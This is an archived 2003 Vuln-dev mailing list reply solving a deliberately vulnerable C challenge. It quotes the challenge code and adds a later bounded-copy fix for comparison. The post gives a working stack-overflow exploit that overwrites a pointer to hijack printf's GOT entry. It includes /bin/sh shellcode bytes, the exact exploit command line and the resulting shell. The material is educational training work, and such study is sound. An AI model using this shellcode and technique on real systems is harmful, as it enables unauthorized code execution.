Vulnerability Development mailing list archives

Re: [Vuln-dev Challenge] Challenge #2


From: Jason_Royes <jroyes () da-experts com>
Date: 24 May 2003 01:05:54 -0400

Strategy was to overwrite printf pointer with shellcode address.

1) Overwrite pointer held in bfp with strcpy(buf, argv[1]).

before:
[buf][bfp][ret]
after:
[buf][&printf - 2][ret]

Subtract 2 from the printf address to compensate for the ";;" prefix written by fprintf(f1, ";;%s;;", ...).

2) Overwrite the printf function pointer with argv[2] via fgets(bfp, BFSIZE, f1); f1 contains the address of argv[1] or buf.

3) printf is then called which gives a shell.

Note that a BFSIZE of 90 actually allocates 92 bytes on the stack.

/* vulndev2.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* for strcpy(); not included in the original */

#define BFSIZE 90

int
main(int argc, char *argv[])
{
        char    *bfp;           /* heap pointer; lies directly above buf on the stack */
        char    buf[BFSIZE];    /* 90 bytes, padded to 92 */
        FILE    *f1;

        if (argc != 3)
                return 1;
        if ( (bfp = malloc(BFSIZE)) == NULL)
                return 1;
        /* debug */
        printf("bfp = %p, buf = %p\n", bfp, buf);

        /* log input: argv[2] is written verbatim between the ";;" markers */
        if ( (f1 = fopen("db.log", "a+")) == NULL)
                return 1;
        fprintf(f1, ";;%s;;", argv[2]);
        fclose(f1);

        /* unbounded copy: argv[1] longer than buf overwrites bfp (and ret) */
        strcpy(buf, argv[1]);

        /* read log: the write goes through bfp, wherever it now points */
        if ( (f1 = fopen("db.log", "r")) == NULL)
                return 1;
        if (fgets(bfp, BFSIZE, f1) == NULL)
                return 1;

        printf("%s\n", bfp);
        fclose(f1);
        exit(1);
}
##
jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2

vd2:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049874 R_386_GLOB_DAT    __gmon_start__
08049848 R_386_JUMP_SLOT   __register_frame_info
0804984c R_386_JUMP_SLOT   fprintf
08049850 R_386_JUMP_SLOT   malloc
08049854 R_386_JUMP_SLOT   __deregister_frame_info
08049858 R_386_JUMP_SLOT   fgets
0804985c R_386_JUMP_SLOT   __libc_start_main
08049860 R_386_JUMP_SLOT   printf
08049864 R_386_JUMP_SLOT   fclose
08049868 R_386_JUMP_SLOT   exit
0804986c R_386_JUMP_SLOT   fopen
08049870 R_386_JUMP_SLOT   strcpy


jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell
00000000  31 db 31 c9 b0 46 cd 80  31 c0 50 68 2f 73 68 ff  |1.1..F..1.Ph/sh.|
00000010  88 44 24 03 68 2f 62 69  6e 89 e3 50 53 89 e1 31  |.D$.h/bin..PS..1|
00000020  d2 b0 0b cd 80                                    |.....|
00000025
jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf 
"\x6c\xfa\xff\xbf"`
bfp = 0x8049898, buf = 0xbffffa6c
sh-2.05a$ exit
jroyes@tadpole:~/study/vuln-dev/cha2$ 
##
Thanks to sin for the tiny shellcode.

On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:

We are announcing the second challenge.  Initially, we wanted to have this
out a few days ago but were involved in testing it on multiple platforms.
This challenge is a little easier than the first one, since we'd like to
see more people attempting to produce a proof-of-concept.  If you find it
too easy, you're welcome to attempt it in an environment with a
non-executable stack/heap to raise the bar a little.

Here's a link to the basic guidelines (for those who missed it):

http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0

(also, please retain the [Vuln-dev Challenge] string in the subject line
for replies to make for easier filtering for those not interested in
challenge related discussion.)

---

/* vulndev2.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* for strcpy() */

#define BFSIZE 90

int
main(int argc, char *argv[])
{
        char    *bfp;
        char    buf[BFSIZE];
        FILE    *f1;

        if (argc != 3)
                return 1;
        if ( (bfp = malloc(BFSIZE)) == NULL)
                return 1;

        /* log input */
        if ( (f1 = fopen("db.log", "a+")) == NULL)
                return 1;
        fprintf(f1, ";;%s;;", argv[2]);
        fclose(f1);

        strcpy(buf, argv[1]);

        /* read log */
        if ( (f1 = fopen("db.log", "r")) == NULL)
                return 1;
        if (fgets(bfp, BFSIZE, f1) == NULL)
                return 1;

        printf("%s\n", bfp);
        fclose(f1);
        exit(1);
}

---

Dave McKinney
Symantec

keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB  3B29 4D89 3A70 BF91 9DD7
-- 
Jason Royes
Data Access Experts
http://www.da-experts.com/
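The same program with the unbounded strcpy() replaced by a length-checked copy, as an added example for comparison; this is not code from the challenge or from either post, and safe_copy_arg() is a helper introduced here:

```c
/* Added example (not from either post): argv[1] handling of vulndev2.c
 * with the unbounded strcpy() replaced by a length-checked copy that
 * rejects input which would run past buf into bfp and the return address. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BFSIZE 90

/* Copy src into dst only if it fits, NUL included. Returns 0 on success,
 * -1 if src would overflow dst; in that case nothing is written. */
int safe_copy_arg(char *dst, size_t dstsz, const char *src)
{
        size_t n = strlen(src);
        if (dstsz == 0 || n >= dstsz)
                return -1;
        memcpy(dst, src, n + 1);
        return 0;
}

int
main(int argc, char *argv[])
{
        char    *bfp;
        char    buf[BFSIZE];
        FILE    *f1;

        if (argc != 3)
                return 1;
        if ( (bfp = malloc(BFSIZE)) == NULL)
                return 1;

        /* log input: the format string is fixed, so argv[2] is plain data */
        if ( (f1 = fopen("db.log", "a+")) == NULL)
                return 1;
        fprintf(f1, ";;%s;;", argv[2]);
        fclose(f1);

        /* bounded copy instead of strcpy(buf, argv[1]) */
        if (safe_copy_arg(buf, sizeof buf, argv[1]) != 0) {
                fprintf(stderr, "argument too long (max %d bytes)\n", BFSIZE - 1);
                return 1;
        }
        /* read log: fgets() is already bounded by BFSIZE */
        if ( (f1 = fopen("db.log", "r")) == NULL || fgets(bfp, BFSIZE, f1) == NULL)
                return 1;
        printf("%s\n", bfp);
        fclose(f1);
        return 0;
}
```

With this check, the 55-byte padding plus shellcode used in the write-up (92 bytes and more) is refused before anything reaches bfp.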
